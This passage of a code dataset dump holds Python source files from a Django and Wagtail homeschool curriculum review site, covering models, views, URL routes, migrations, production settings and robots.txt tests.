protected]\",\n username=f\"username{name}\",\n password=f\"password{name}\",\n )\n user.save()\n review = Review.objects.create(\n curriculum=curriculum, content=name, rating=5, user=user\n )\n\n self.assertEqual(list(curriculum.reviews.all()), [review])\n self.assertEqual(list(user.reviews.all()), [review])\n"
},
{
"alpha_fraction": 0.70333331823349,
"alphanum_fraction": 0.70333331823349,
"avg_line_length": 22.076923370361328,
"blob_id": "063c234ff1efa2356b38b2e8399b2cdd2508463c",
"content_id": "03cdccd7326eab5d4bbe9997c0e772441766f37c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 300,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 13,
"path": "/fphs/utils/admin.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\nfrom .models import Contact\n\n\nclass ContactAdmin(admin.ModelAdmin):\n list_display = (\"id\", \"email\", \"message\", \"replied\")\n list_display_links = (\"email\",)\n list_filter = (\"replied\",)\n\n\n# Register your models here.\nadmin.site.register(Contact, ContactAdmin)\n"
},
{
"alpha_fraction": 0.5740072131156921,
"alphanum_fraction": 0.6371841430664062,
"avg_line_length": 26.700000762939453,
"blob_id": "d0b74f711e4511ed6112c0b06bf6752f4443ff7c",
"content_id": "3004a99afa63d61998178562fa0cfe6a2ff7d386",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 554,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 20,
"path": "/fphs/curriculums/migrations/0012_curriculum_image.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.5 on 2020-07-29 16:00\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('wagtailimages', '0022_uploadedimage'),\n ('curriculums', '0011_auto_20200529_0234'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='curriculum',\n name='image',\n field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='wagtailimages.Image'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6461731195449829,
"alphanum_fraction": 0.6461731195449829,
"avg_line_length": 26.482759475708008,
"blob_id": "a128c9383b604284e2565314d598ccebd8d8157c",
"content_id": "094e887dd3d0008a451368ce84930d3f4f1fee46",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 797,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 29,
"path": "/fphs/curriculums/urls.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.urls import include, path\n\nfrom .views import (\n CurriculumListView,\n detail,\n favorite,\n CurriculumCreateView,\n ReviewsIndexView,\n ReviewCreateView,\n ReviewUpdateView,\n)\n\nreview_urls = [\n path(\"\", ReviewsIndexView.as_view(), name=\"index\"),\n path(\"create/\", ReviewCreateView.as_view(), name=\"create\"),\n path(\"<str:uuid>/\", ReviewUpdateView.as_view(), name=\"update\"),\n]\n\napp_name = \"curriculums\"\n\nurlpatterns = [\n path(\"\", CurriculumListView.as_view(), name=\"index\"),\n path(\"create/\", CurriculumCreateView.as_view(), name=\"create\"),\n path(\"<slug:slug>/\", detail, name=\"detail\"),\n path(\"<slug:slug>/favorite/\", favorite, name=\"favorite\"),\n path(\n \"<slug:slug>/reviews/\", include((review_urls, \"reviews\"), namespace=\"reviews\")\n ),\n]\n"
},
{
"alpha_fraction": 0.6673076748847961,
"alphanum_fraction": 0.6711538434028625,
"avg_line_length": 29.58823585510254,
"blob_id": "7e3509d6f61df6a9e79c4681cd04d29951af8c0a",
"content_id": "cc52b4de97694b1728e81f924dd330eb3409d3d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1560,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 51,
"path": "/fphs/blog/models.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.db import models\n\nfrom wagtail.core.models import Page\nfrom wagtail.core.fields import RichTextField\nfrom wagtail.admin.edit_handlers import FieldPanel\nfrom wagtail.search import index\n\nfrom wagtailmetadata.models import MetadataPageMixin\n\n\nclass BlogIndex(Page):\n intro = RichTextField(blank=True)\n\n content_panels = Page.content_panels + [FieldPanel(\"intro\", classname=\"full\")]\n\n def get_posts(self):\n return self.get_children().live().public().order_by(\"-first_published_at\")\n\n def paginate(self, request):\n page = request.GET.get(\"page\")\n paginator = Paginator(self.get_posts(), 10)\n try:\n pages = paginator.page(page)\n except PageNotAnInteger:\n pages = paginator.page(1)\n except EmptyPage:\n pages = paginator.page(paginator.num_pages)\n return pages\n\n def get_context(self, request, **kwargs):\n context = super().get_context(request)\n context[\"posts\"] = self.paginate(request)\n return context\n\n\nclass BlogPost(MetadataPageMixin, Page):\n description = models.CharField(max_length=255)\n body = RichTextField(blank=True)\n date = models.DateField(\"Post date\")\n\n search_fields = Page.search_fields + [\n index.SearchField(\"description\"),\n index.SearchField(\"body\"),\n ]\n\n content_panels = Page.content_panels + [\n FieldPanel(\"description\"),\n FieldPanel(\"body\", classname=\"full\"),\n FieldPanel(\"date\"),\n ]\n"
},
{
"alpha_fraction": 0.6051204800605774,
"alphanum_fraction": 0.6137048006057739,
"avg_line_length": 41.02531814575195,
"blob_id": "7cc78cbed0039f142980ce66c441bf267e2521ca",
"content_id": "35aa5a619f9581970837a6e1a8578b4720b25ddf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6640,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 158,
"path": "/config/settings/production.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "import logging\n\nimport sentry_sdk\nfrom sentry_sdk.integrations.django import DjangoIntegration\nfrom sentry_sdk.integrations.logging import LoggingIntegration\n\nfrom .base import * # noqa\nfrom .base import env\n\n# EMAIL\n# ------------------------------------------------------------------------------\n# Anymail\n# ------------------------------------------------------------------------------\n# https://anymail.readthedocs.io/en/stable/installation/#installing-anymail\nINSTALLED_APPS += [\"anymail\"] # noqa F405\n# https://docs.djangoproject.com/en/dev/ref/settings/#email-backend\n# https://anymail.readthedocs.io/en/stable/installation/#anymail-settings-reference\n# https://anymail.readthedocs.io/en/stable/esps/mailgun\nANYMAIL = env.dict(\"DJANGO_ANYMAIL_OPTIONS\")\n\n\n# STORAGES\n# ------------------------------------------------------------------------------\n# https://django-storages.readthedocs.io/en/latest/#installation\nINSTALLED_APPS += [\"storages\"] # noqa F405\n# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings\nAWS_ACCESS_KEY_ID = env(\"DJANGO_AWS_ACCESS_KEY_ID\")\n# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings\nAWS_SECRET_ACCESS_KEY = env(\"DJANGO_AWS_SECRET_ACCESS_KEY\")\n# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings\nAWS_STORAGE_BUCKET_NAME = env.str(\"DJANGO_AWS_STORAGE_BUCKET_NAME\")\n# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings\nAWS_QUERYSTRING_AUTH = False\n# DO NOT change these unless you know what you\"re doing.\n_AWS_EXPIRY = 60 * 60 * 24 * 7\n# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings\nAWS_S3_OBJECT_PARAMETERS = {\n \"CacheControl\": f\"max-age={_AWS_EXPIRY}, s-maxage={_AWS_EXPIRY}, must-revalidate\"\n}\n# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings\nAWS_S3_REGION_NAME = env.str(\"DJANGO_AWS_S3_REGION_NAME\", default=None)\n# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#cloudfront\nAWS_S3_CUSTOM_DOMAIN = env(\"DJANGO_AWS_S3_CUSTOM_DOMAIN\", default=None)\naws_s3_domain = AWS_S3_CUSTOM_DOMAIN or f\"{AWS_STORAGE_BUCKET_NAME}.s3.amazonaws.com\"\n# STATIC\n# ------------------------\nSTATICFILES_STORAGE = \"fphs.utils.storages.StaticRootS3Boto3Storage\"\nSTATIC_URL = f\"https://{aws_s3_domain}{STATIC_URL}\" # noqa F405\n# MEDIA\n# ------------------------------------------------------------------------------\nDEFAULT_FILE_STORAGE = \"fphs.utils.storages.MediaRootS3Boto3Storage\"\nMEDIA_URL = f\"https://{aws_s3_domain}{MEDIA_URL}\" # noqa F405\n\n\n# LOGGING\n# ------------------------------------------------------------------------------\n# https://docs.djangoproject.com/en/dev/ref/settings/#logging\n# See https://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n \"version\": 1,\n \"disable_existing_loggers\": True,\n \"formatters\": {\n \"django.server\": {\n \"()\": \"django.utils.log.ServerFormatter\",\n \"format\": \"[{server_time}] {message}\",\n \"style\": \"{\",\n },\n \"verbose\": {\n \"format\": \"%(levelname)s %(asctime)s %(module)s \"\n \"%(process)d %(thread)d %(message)s\"\n },\n },\n \"handlers\": {\n \"console\": {\n \"level\": \"INFO\",\n \"class\": \"logging.StreamHandler\",\n \"formatter\": \"verbose\",\n },\n \"django.server\": {\n \"level\": \"INFO\",\n \"class\": \"logging.StreamHandler\",\n \"formatter\": 
\"django.server\",\n },\n },\n \"loggers\": {\n \"django\": {\"handlers\": [\"console\"], \"level\": \"INFO\", \"propogate\": False},\n \"django.server\": {\n \"handlers\": [\"django.server\"],\n \"level\": \"INFO\",\n \"propagate\": False,\n },\n # Errors logged by the SDK itself\n \"sentry_sdk\": {\"handlers\": [\"console\"], \"level\": \"ERROR\", \"propagate\": False},\n },\n \"root\": {\"level\": \"ERROR\", \"handlers\": [\"console\"]},\n}\n\n# Sentry\n# ------------------------------------------------------------------------------\nSENTRY_DSN = env.str(\"DJANGO_SENTRY_DSN\")\nSENTRY_LOG_LEVEL = env.int(\"DJANGO_SENTRY_LOG_LEVEL\", default=logging.INFO)\n\nsentry_logging = LoggingIntegration(\n level=SENTRY_LOG_LEVEL, # Capture info and above as breadcrumbs\n event_level=logging.ERROR, # Send errors as events\n)\nintegrations = [sentry_logging, DjangoIntegration()]\nsentry_sdk.init(\n dsn=SENTRY_DSN,\n integrations=integrations,\n environment=env(\"DJANGO_SENTRY_ENVIRONMENT\", default=\"production\"),\n traces_sample_rate=env.float(\"DJANGO_SENTRY_TRACES_SAMPLE_RATE\", default=0.0),\n)\n\n\n# SECURITY\n# ------------------------------------------------------------------------------\n# https://docs.djangoproject.com/en/dev/ref/settings/#secure-proxy-ssl-header\nSECURE_PROXY_SSL_HEADER = (\"HTTP_X_FORWARDED_PROTO\", \"https\")\n# https://docs.djangoproject.com/en/dev/ref/settings/#secure-ssl-redirect\nSECURE_SSL_REDIRECT = env.bool(\"DJANGO_SECURE_SSL_REDIRECT\", default=False)\n# https://docs.djangoproject.com/en/dev/ref/settings/#session-cookie-secure\nSESSION_COOKIE_SECURE = True\n# https://docs.djangoproject.com/en/dev/ref/settings/#csrf-cookie-secure\nCSRF_COOKIE_SECURE = True\n# https://docs.djangoproject.com/en/dev/topics/security/#ssl-https\n# https://docs.djangoproject.com/en/dev/ref/settings/#secure-hsts-seconds\n# TODO: set this to 60 seconds first and then to 518400 once you prove the former works\n# SECURE_HSTS_SECONDS = env.int(\"DJANGO_SECURE_HSTS_SECONDS\", default=60)\n# https://docs.djangoproject.com/en/dev/ref/settings/#secure-hsts-include-subdomains\nSECURE_HSTS_INCLUDE_SUBDOMAINS = env.bool(\n \"DJANGO_SECURE_HSTS_INCLUDE_SUBDOMAINS\", default=False\n)\n# https://docs.djangoproject.com/en/dev/ref/settings/#secure-hsts-preload\nSECURE_HSTS_PRELOAD = env.bool(\"DJANGO_SECURE_HSTS_PRELOAD\", default=False)\n# https://docs.djangoproject.com/en/dev/ref/middleware/#x-content-type-options-nosniff\nSECURE_CONTENT_TYPE_NOSNIFF = env.bool(\n \"DJANGO_SECURE_CONTENT_TYPE_NOSNIFF\", default=False\n)\n\n\n# TEMPLATES\n# ------------------------------------------------------------------------------\n# https://docs.djangoproject.com/en/dev/ref/settings/#templates\nTEMPLATES[-1][\"OPTIONS\"][\"loaders\"] = [ # type: ignore[index] # noqa F405\n (\n \"django.template.loaders.cached.Loader\",\n [\n \"django.template.loaders.filesystem.Loader\",\n \"django.template.loaders.app_directories.Loader\",\n ],\n )\n]\n\n\n# Your stuff...\n# ------------------------------------------------------------------------------\n"
},
{
"alpha_fraction": 0.6865671873092651,
"alphanum_fraction": 0.6886993646621704,
"avg_line_length": 36.52000045776367,
"blob_id": "078273fb24aa4989c4d2660e53b3a5ba9c57edb4",
"content_id": "680ebe8091d0de7d6e29f2931b0f42d9ff5e2d13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 938,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 25,
"path": "/fphs/utils/tests.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from http import HTTPStatus\n\nfrom django.test import TestCase\n\n\nclass RobotsTxtTests(TestCase):\n def test_get_robot_txt(self):\n self._assert_robot_txt_by_domain(\"firstpickhomeschool.com\", \"Disallow: /admin\")\n\n def test_get_robot_txt_subdomain(self):\n self._assert_robot_txt_by_domain(\"test.firstpickhomeschool.com\", \"Disallow: /\")\n\n def test_post_robot_txt_disallowed(self):\n response = self.client.post(\"/robots.txt\")\n\n self.assertEqual(HTTPStatus.METHOD_NOT_ALLOWED, response.status_code)\n\n def _assert_robot_txt_by_domain(self, host, disallowed):\n response = self.client.get(\"/robots.txt\", HTTP_HOST=host)\n lines = response.content.decode().splitlines()\n\n self.assertEqual(response.status_code, HTTPStatus.OK)\n self.assertEqual(response[\"content-type\"], \"text/plain\")\n self.assertEqual(lines[0], \"User-Agent: *\")\n self.assertEqual(lines[1], disallowed)\n"
},
{
"alpha_fraction": 0.6279417276382446,
"alphanum_fraction": 0.63279789686203,
"avg_line_length": 33.7662353515625,
"blob_id": "b182a80961b20ba09f0037d5dffd85468cc0d94a",
"content_id": "13c581aafe3a3c12573d43e4b39fada6b06f96f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8031,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 231,
"path": "/fphs/curriculums/views.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.db.models import Avg, Q\nfrom django.db.models.functions import Coalesce\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404, render, redirect\nfrom django.urls import reverse\nfrom django.views import generic\nfrom django.views.decorators.http import require_GET\nfrom fphs.users.models import User\nfrom fphs.utils.models import Metadata\nfrom .models import (\n Curriculum,\n CurriculumForm,\n ReviewForm,\n Category,\n Subject,\n Grade,\n Age,\n ReligiousPreference,\n Sort,\n Review,\n)\n\n\nclass CurriculumListView(generic.ListView):\n model = Curriculum\n template_name = \"curriculums/index.html\"\n context_object_name = \"curriculums\"\n paginate_by = 20\n\n def get_queryset(self):\n query = Q()\n filters = self.get_filters()\n order = self.get_sort().label\n search = self.request.GET.get(\"q\")\n\n if search:\n query.add(Q(name__icontains=search), Q.OR)\n query.add(Q(description__icontains=search), Q.OR)\n query.add(Q(publisher__name__icontains=search), Q.OR)\n\n if filters[\"categories\"]:\n query.add(Q(subjects__category__id__in=filters[\"categories\"]), Q.AND)\n\n if filters[\"subjects\"]:\n query.add(Q(subjects__id__in=filters[\"subjects\"]), Q.AND)\n\n if filters[\"grades\"]:\n query.add(Q(grades__id__in=filters[\"grades\"]), Q.AND)\n\n if filters[\"ages\"]:\n query.add(Q(ages__id__in=filters[\"ages\"]), Q.AND)\n\n if filters[\"preference\"]:\n query.add(Q(religious_preference__id__in=filters[\"preference\"]), Q.AND)\n\n return (\n Curriculum.objects.annotate(\n avg_rating=Coalesce(Avg(\"reviews__rating\"), 0.0)\n )\n .filter(is_confirmed=True)\n .filter(query)\n .distinct()\n .order_by(order)\n )\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"q\"] = self.request.GET.get(\"search\")\n context[\"filters\"] = self.get_filters()\n context[\"sorters\"] = Sort.Labels.choices\n context[\"sort\"] = self.request.GET.get(\"sort\")\n context[\"categories\"] = list(Category.objects.all())\n context[\"subjects\"] = list(Subject.objects.all())\n context[\"grades\"] = list(Grade.objects.all())\n context[\"ages\"] = list(Age.objects.all())\n context[\"preference\"] = list(ReligiousPreference.objects.all())\n context[\"metadata\"] = Metadata(\n self.request, \"Curriculums\", \"List of curriculums\"\n )\n return context\n\n def get_filters(self):\n def get_selections(name):\n try:\n return list(map(int, self.request.GET.getlist(name)))\n except:\n return []\n\n return {\n \"categories\": get_selections(\"category\"),\n \"subjects\": get_selections(\"subject\"),\n \"grades\": get_selections(\"grade\"),\n \"ages\": get_selections(\"age\"),\n \"preference\": get_selections(\"preference\"),\n }\n\n def get_sort(self):\n try:\n s = self.request.GET.get(\"sort\")\n return Sort.Values(int(s)) if s.isdigit() else Sort.Values.NEWEST\n except:\n return Sort.Values.NEWEST\n\n\n@require_GET\ndef detail(request, slug):\n curriculum = get_object_or_404(Curriculum, slug=slug, is_confirmed=True)\n categories = set(\n map(lambda s: s.category, curriculum.subjects.select_related(\"category\"))\n )\n reviews = curriculum.reviews.order_by(\"-created\")[:3]\n\n def get_values(items):\n return items[0], items[-1] if len(items) > 1 else None\n\n context = {\n \"curriculum\": curriculum,\n \"categories\": categories,\n 
\"subjects\": curriculum.subjects.all(),\n \"grades\": get_values(list(curriculum.grades.all())),\n \"ages\": get_values(list(curriculum.ages.all())),\n \"reviews\": reviews,\n \"avg_rating\": reviews.aggregate(avg_rating=Coalesce(Avg(\"rating\"), 0.0))[\n \"avg_rating\"\n ],\n }\n return render(request, \"curriculums/detail.html\", context)\n\n\n@login_required\ndef favorite(request, slug):\n curriculum = get_object_or_404(Curriculum, slug=slug, is_confirmed=True)\n # Redirect to detail page after login\n if request.method == \"GET\":\n return HttpResponseRedirect(\n reverse(\"curriculums:detail\", kwargs={\"slug\": curriculum.slug})\n )\n\n # Save favorite and go back to previous page\n user: User = request.user\n if curriculum in user.favorite_curriculums.all():\n user.favorite_curriculums.remove(curriculum)\n else:\n user.favorite_curriculums.add(curriculum)\n user.save()\n return HttpResponseRedirect(request.POST.get(\"next\", \"/\"))\n\n\nclass CurriculumCreateView(LoginRequiredMixin, SuccessMessageMixin, generic.CreateView):\n form_class = CurriculumForm\n template_name = \"curriculums/create.html\"\n success_url = \"/curriculums/create/\"\n success_message = \"Your request to add a curriculum was submitted\"\n\n def form_valid(self, form):\n form.instance.created_by = self.request.user\n return super().form_valid(form)\n\n\nclass ReviewsIndexView(generic.ListView):\n model: Review\n template_name = \"reviews/index.html\"\n context_object_name = \"reviews\"\n paginate_by = 20\n\n def get_queryset(self):\n curriculum = get_object_or_404(\n Curriculum, slug=self.kwargs.get(\"slug\"), is_confirmed=True\n )\n return Review.objects.filter(curriculum_id=curriculum.id)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"curriculum\"] = get_object_or_404(\n Curriculum, slug=self.kwargs.get(\"slug\")\n )\n return context\n\n\nclass ReviewCreateView(LoginRequiredMixin, SuccessMessageMixin, generic.CreateView):\n form_class = ReviewForm\n template_name = \"reviews/create.html\"\n success_message = \"Your review has been submitted\"\n\n def get_success_url(self):\n return reverse(\"curriculums:detail\", kwargs={\"slug\": self.kwargs.get(\"slug\")})\n\n def form_valid(self, form):\n form.instance.curriculum = get_object_or_404(\n Curriculum, slug=self.kwargs.get(\"slug\")\n )\n form.instance.user = self.request.user\n return super().form_valid(form)\n\n def render_to_response(self, context, **response_kwargs):\n slug = self.kwargs.get(\"slug\")\n curriculum = get_object_or_404(Curriculum, slug=slug)\n context[\"curriculum\"] = curriculum\n review = (\n curriculum.reviews.filter(user__id=self.request.user.id).first() or None\n )\n # Redirect user to update review if one exists\n if review:\n return redirect(\n \"curriculums:reviews:update\", slug=curriculum.slug, uuid=review.uuid\n )\n return super().render_to_response(context, **response_kwargs)\n\n\nclass ReviewUpdateView(LoginRequiredMixin, SuccessMessageMixin, generic.UpdateView):\n form_class = ReviewForm\n template_name = \"reviews/create.html\"\n success_message = \"Your review has been updated\"\n\n def get_success_url(self):\n return reverse(\"curriculums:detail\", kwargs={\"slug\": self.kwargs.get(\"slug\")})\n\n def get_object(self, queryset=None):\n return get_object_or_404(Review, uuid=self.kwargs.get(\"uuid\"))\n\n def render_to_response(self, context, **response_kwargs):\n # Prevent editing review by another user\n if self.request.user != self.object.user:\n return 
redirect(\"curriculums:detail\", slug=self.kwargs.get(\"slug\"))\n context[\"curriculum\"] = get_object_or_404(\n Curriculum, slug=self.kwargs.get(\"slug\")\n )\n return super().render_to_response(context, **response_kwargs)\n"
},
{
"alpha_fraction": 0.7564767003059387,
"alphanum_fraction": 0.7564767003059387,
"avg_line_length": 26.571428298950195,
"blob_id": "79087fef761947c60324989c6be2275f4e1d1e25",
"content_id": "1db7377289478dab62a51fb6fb753ca1e5e54f1f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 193,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 7,
"path": "/fphs/curriculums/apps.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.apps import AppConfig\nfrom django.utils.translation import gettext_lazy as _\n\n\nclass CurriculumsConfig(AppConfig):\n name = \"fphs.curriculums\"\n verbose_name = _(\"Curriculums\")\n"
},
{
"alpha_fraction": 0.6718202829360962,
"alphanum_fraction": 0.6756126284599304,
"avg_line_length": 31.037384033203125,
"blob_id": "8536b7d2ddccee8a33e7be26a22cf0de2ab4e5ea",
"content_id": "e657fd9ed4984973f31dd79daeed33287df09228",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3428,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 107,
"path": "/fphs/users/views.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.contrib import messages\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.db.models import Avg\nfrom django.db.models.functions import Coalesce\nfrom django.shortcuts import get_object_or_404, redirect\nfrom django.urls import reverse\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.views.generic import ListView, DetailView, RedirectView, UpdateView\nfrom fphs.curriculums.models import Review\nfrom .forms import UserProfileForm, UserPrivacyForm\n\nUser = get_user_model()\n\n\nclass UserRedirectView(LoginRequiredMixin, RedirectView):\n permanent = False\n\n def get_redirect_url(self):\n return reverse(\"users:profile\", kwargs={\"username\": self.request.user.username})\n\n\nclass UserFavoritesView(ListView):\n template_name = \"users/user_favorites_list.html\"\n paginate_by = 10\n\n def get_queryset(self):\n return (\n self.request.user.favorite_curriculums.annotate(\n avg_rating=Coalesce(Avg(\"reviews__rating\"), 0.0)\n )\n .all()\n .order_by(\"-favoritecurriculum__created\")\n )\n\n\nclass UserProfileView(DetailView):\n model = User\n slug_field = \"username\"\n slug_url_kwarg = \"username\"\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"reviews\"] = Review.objects.filter(\n user__username=self.object.username\n ).order_by(\"-created\")[:3]\n return context\n\n\nclass UserProfileEditView(LoginRequiredMixin, UpdateView):\n form_class = UserProfileForm\n\n def get_object(self):\n return User.objects.get(username=self.request.user.username)\n\n def get_success_url(self):\n return reverse(\"users:profile-edit\")\n\n def form_valid(self, form):\n messages.add_message(\n self.request, messages.SUCCESS, _(\"Profile successfully updated\")\n )\n return super().form_valid(form)\n\n\nclass UserPrivacyView(LoginRequiredMixin, UpdateView):\n form_class = UserPrivacyForm\n\n def get_object(self):\n return User.objects.get(username=self.request.user.username)\n\n def get_success_url(self):\n return reverse(\"users:privacy\")\n\n def form_valid(self, form):\n messages.add_message(\n self.request, messages.SUCCESS, _(\"Settings successfully updated\")\n )\n return super().form_valid(form)\n\n\nclass UserReviewsListView(ListView):\n model = Review\n slug_field = \"username\"\n slug_url_kwarg = \"username\"\n template_name = \"users/user_reviews_list.html\"\n context_object_name = \"reviews\"\n paginate_by = 10\n user = None\n\n def setup(self, request, *args, **kwargs):\n self.user = get_object_or_404(User, username=kwargs.get(\"username\"))\n return super().setup(request, *args, **kwargs)\n\n def get_queryset(self):\n return Review.objects.filter(user_id=self.user.id)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"user\"] = self.user\n return context\n\n def get(self, request, *args, **kwargs):\n # Redirect to user's profile if public reviews are disabled and accessed by a different user\n if not self.user.public_reviews and self.user != request.user:\n return redirect(\"users:profile\", username=self.user)\n return super().get(request, *args, **kwargs)\n"
},
{
"alpha_fraction": 0.5258620977401733,
"alphanum_fraction": 0.5793103575706482,
"avg_line_length": 24.217391967773438,
"blob_id": "66914ba13fa61972c3056f9b726890ae785d9b3f",
"content_id": "a97d91d7a262f1726bcf2cddbfcf9f42aebf7aaf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 580,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 23,
"path": "/fphs/curriculums/migrations/0006_auto_20200104_0004.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.0.1 on 2020-01-04 00:04\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"curriculums\", \"0005_auto_20200103_2354\"),\n ]\n\n operations = [\n migrations.AlterField(\n model_name=\"curriculum\",\n name=\"publisher\",\n field=models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE,\n related_name=\"curriculums\",\n to=\"curriculums.Publisher\",\n ),\n ),\n ]\n"
},
{
"alpha_fraction": 0.7068965435028076,
"alphanum_fraction": 0.7137930989265442,
"avg_line_length": 31.22222137451172,
"blob_id": "12afa2cc1809c4a343d5f1a758f02fc65a5f540c",
"content_id": "5a0410d104cec0d517c82895c8e2adcae8376dac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 580,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 18,
"path": "/fphs/users/migrations/0006_create_through_relation_favorites.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth import get_user_model\nfrom django.db import migrations\n\ndef create_through_relations(apps, schema_editor):\n User = get_user_model()\n FavoriteCurriculum = apps.get_model('users', 'FavoriteCurriculum')\n for user in User.objects.all():\n for curriculum in user.favorite_curriculums.all():\n FavoriteCurriculum(user=user, curriculum=curriculum).save()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('users', '0005_favoritecurriculum'),\n ]\n\n operations = [migrations.RunPython(create_through_relations)]\n"
},
{
"alpha_fraction": 0.5975610017776489,
"alphanum_fraction": 0.6060975790023804,
"avg_line_length": 27.275861740112305,
"blob_id": "dfb2e498d4539cab91f226fb50cc98f129fa099c",
"content_id": "0038baf4f82b54e6e501d27a788a0b5dd3a63231",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 820,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 29,
"path": "/fphs/curriculums/migrations/0014_review_uuid.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from django.db import migrations, models\nimport uuid\n\ndef generate_uuid(apps, schema_editor):\n Review = apps.get_model(\"curriculums\", \"Review\")\n for review in Review.objects.all():\n review.uuid = uuid.uuid4()\n review.save(update_fields=[\"uuid\"])\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"curriculums\", \"0013_curriculum_slug\"),\n ]\n\n operations = [\n migrations.AddField(\n model_name=\"review\",\n name=\"uuid\",\n field=models.UUIDField(default=uuid.uuid4, editable=False, null=True),\n ),\n migrations.RunPython(generate_uuid),\n migrations.AlterField(\n model_name=\"review\",\n name=\"uuid\",\n field=models.UUIDField(default=uuid.uuid4, editable=False, unique=True),\n )\n ]\n"
},
{
"alpha_fraction": 0.7179962992668152,
"alphanum_fraction": 0.72541743516922,
"avg_line_length": 25.950000762939453,
"blob_id": "f3fda15a86efaf833441ae5fa708bdcad3b3ba6f",
"content_id": "f77978a9b4cf8502f8ceb9c9ce3b029e23526621",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 539,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 20,
"path": "/fphs/users/migrations/0010_create_superuser.py",
"repo_name": "Lbatson/first-pick-homeschool",
"src_encoding": "UTF-8",
"text": "from config.settings.base import ADMIN_EMAIL, ADMIN_USERNAME, ADMIN_PASSWORD\nfrom django.contrib.auth import get_user_model\nfrom django.db import migrations\n\n\ndef create_superuser(apps, schema_editor):\n superuser = get_user_model().objects.create_superuser(\n email=ADMIN_EMAIL, username=ADMIN_USERNAME, password=ADMIN_PASSWORD\n )\n\n superuser.save()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"users\", \"0009_remove_user_occupation\"),\n ]\n\n operations = [migrations.RunPython(create_superuser)]\n"
},
{
"alpha_fraction": 0.5663385987281799,
"alphanum_fraction": 0.5771653652191162,
